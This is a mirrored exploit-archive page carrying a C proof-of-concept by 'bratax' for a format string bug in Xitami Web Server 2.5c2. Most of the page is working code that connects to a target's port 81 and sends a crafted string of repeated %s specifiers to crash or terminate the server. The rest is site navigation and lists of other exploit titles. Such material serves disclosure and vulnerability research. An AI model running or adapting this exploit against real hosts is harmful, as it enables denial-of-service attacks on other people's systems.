首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Xitami Web Server v2.5c2 LRWP Processing Format String PoC 来源：http://www.bratax.be/ 作者：bratax 发布时间：2008-04-07   /** * * PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug * Advisory is available at: http://www.bratax.be/advisories/b013.html * (multiple vulnerabilities! check it out!) * * @author: bratax * @url: http://www.bratax.be/ * @email: bratax@gmail.com * * Thanks to BuzzDee for learning me how to use reverse code engineering to * find bugs & thanks to DiabloHorn as well ;-) * Greetz to NR! * **/ #include <stdio.h> #include <string.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") #define PORT 81 // target port int main(int argc, char *argv[]){   int sockfd;   struct hostent *he;   struct sockaddr_in their_addr;   WSADATA wsaData;   char formatstring[250];   if (argc != 2){     printf("\nXitami Web Server 2.5c2\n" );     printf("Format String PoC by bratax - http://www.bratax.be/\n\n");     printf("[+] tested on WinXP Pro SP2 & Vista\n");     printf("[+] usage: %s <hostname>\n\n", argv[0]);     return -1;   }     if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {     fprintf(stderr, "WSAStartup failed.\n");     return -1;   }   if ((he=gethostbyname(argv[1])) == NULL){  // get the host info     perror("gethoscattbyname");     return -1;   }   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){     perror("socket");     return -1;   }   their_addr.sin_family = AF_INET;  // host byte order   their_addr.sin_port = htons(PORT);  // short, network byte order   their_addr.sin_addr = *((struct in_addr *)he->h_addr);   memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct   if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){     printf("[-] Connect failed.\n");     closesocket(sockfd);     return -1;   }   printf("[+] Server is listening...\n");   Sleep(1000);   /*     setup format string request:               %s*100 + \xFF + somestring + \xFF     (program termination)     or:               %n + \xFF + somestring + \xFF         (program crash)   */   memset(formatstring,'\x41', sizeof(formatstring));   for (int i = 0; i<200; i+=2){     memcpy(formatstring+i, "%s", 2);   }   memcpy(formatstring+200, "\xFF", 1);   memcpy(formatstring+249, "\xFF", 1);   printf("[+] Sending format string request...");   Sleep(2000);   if (send(sockfd,formatstring,sizeof(formatstring),0) == -1) {     Sleep(2000);     printf("failed! Exiting...\n");     closesocket(sockfd);     WSACleanup();     return -1;   }   Sleep(2000);   closesocket(sockfd);   printf("done.\n");   return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft Visual InterDev 6.0 ·SCO UnixWare < 7.1.4 p534589 ( ·XnView 1.92.1 Slideshow (FontN ·SCO UnixWare Reliant HA Local ·Novel eDirectory HTTP Denial o ·SCO UnixWare Merge mcd Local R ·Mcafee EPO 4.0 FrameworkServic ·MS Visual Basic Enterprise Ed. ·HP OpenView NNM 7.5.1 OVAS.exe ·Sun Solaris <= 10 rpc.ypupdate ·Nuked-Klan <= 1.7.6 Multiple V ·Picture Rating 1.0 Blind SQL I   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved